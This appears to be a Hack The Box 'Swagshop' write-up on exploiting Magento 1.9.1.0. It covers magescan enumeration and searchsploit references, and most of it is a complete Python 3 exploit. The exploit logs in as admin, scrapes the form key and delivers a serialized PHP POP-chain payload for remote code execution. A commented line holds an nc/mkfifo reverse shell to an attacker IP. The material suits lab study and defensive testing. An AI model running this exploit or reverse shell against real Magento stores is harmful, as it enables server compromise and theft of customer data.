Magento
Magento is an ecommerce platform that allows users to create a store and showcase their products.
Enumeration
magescan is an automated tool which, like wpscan, checks for basic configuration locations — here:
php magescan.phar scan:all http://swagshop.htb
Exploits
When Magento is not patched with SUPEE-5344 and is version 1.9.1.0 CE / 1.14.1.0 EE (which magescan will enumerate),
remote code execution is possible:
searchsploit -x 37977
The exploit creates an admin account in the Magento application, which can then be used to perform RCE as an authenticated user:
searchsploit -x 37811
The Python 3 version of 37811 is below; it worked fine for Swagshop (HTB).
#!/usr/bin/env python3
from hashlib import md5
import sys
import re
import base64
import requests
from pwn import log
# Admin credentials used for the authenticated step; presumably the account the
# earlier 37977 step created — confirm against that run.
username = "forme"
password = "forme"
url = "http://swagshop.htb/index.php/admin"
# Every request goes through a local intercepting proxy (no https entry, so only http is proxied).
proxy = {"http" :"http://localhost:8080"}
# Form fields of the admin login page.
data = {"login[username]" : username,
        "login[password]" : password}
#arg = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f'
arg = "whoami"
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = b'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
# POP chain to pivot into call_user_exec
# This is a PHP-serialized object graph (Zend_Log -> Zend_Log_Writer_Mail -> Zend_Config_Writer_Yaml
# -> Varien_Object).  The two %d/%s pairs are filled with the length and text of php_function and
# arg; the lengths must match exactly or PHP will refuse to unserialize.  Each '\00' is a NUL byte
# (Python octal escape), which is how PHP marks protected property names in serialized output —
# the verbatim string is what the unserialize sink expects, so it is not meant to be edited.
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
'\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
'_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
len(arg), arg)
# session
log.info("Initializing the session")
session = requests.Session()
# Loign Successful
r = session.post(url=url, data=data, proxies=proxy)
# NOTE(review): a 200 status alone does not prove the login succeeded — a re-rendered login
# page also returns 200; the regex lookups below will raise AttributeError in that case.
if r.status_code == 200:
    log.success("Logged in as admin...")
else:
    log.error("Failed to login")  # pwntools log.error raises, so the script stops here
# The admin dashboard embeds the AJAX block base URL and the CSRF form key; both are
# pulled out of the HTML with regexes.
burl = re.search("ajaxBlockUrl = \'(.*)\'", r.text)
burl = burl.group(1)
# print(burl) # identifies block url and key
key = re.search("var FORM_KEY = '(.*)'", r.text)
key = key.group(1)
# print(key)
log.info("Identified block url and key")
# Fetch the orders-tab dashboard block; the form key is sent as a request body on a GET.
dn = session.get(burl + 'block/tab_orders/period/1y/?isAjax=true', data='isAjax=false&form_key=' + key)
# The block's HTML contains an image/src URL that carries a "ga" query parameter; that URL
# is the endpoint the serialized payload is delivered to.
tunnel = re.search("src=\"(.*)\?ga=", dn.text)
tunnel = bytes(tunnel.group(1), 'utf-8')
# ga = base64 of the serialized object; h = md5(ga + install_date), which the server uses as an
# integrity check (hence the install_date above must be exact).
payload = base64.b64encode(bytes(payload, 'utf-8'))
gh = bytes(md5(payload + install_date).hexdigest(), 'utf-8')
exploit = tunnel + b'?ga=' + payload + b'&h=' + gh
# Observable artifact for log review: a single authenticated GET to this tunnel path whose
# "ga" parameter is a long base64 blob (decoding to PHP serialize output) plus an "h" md5.
log.info("Exploit constructed")
test_ = exploit.decode()
test = session.get(url=test_)
# The response body carries the output of the PHP function call (here, whoami).
log.success("Successfully exploited...")
print(test.text)
Machine:
Swagshop - HTB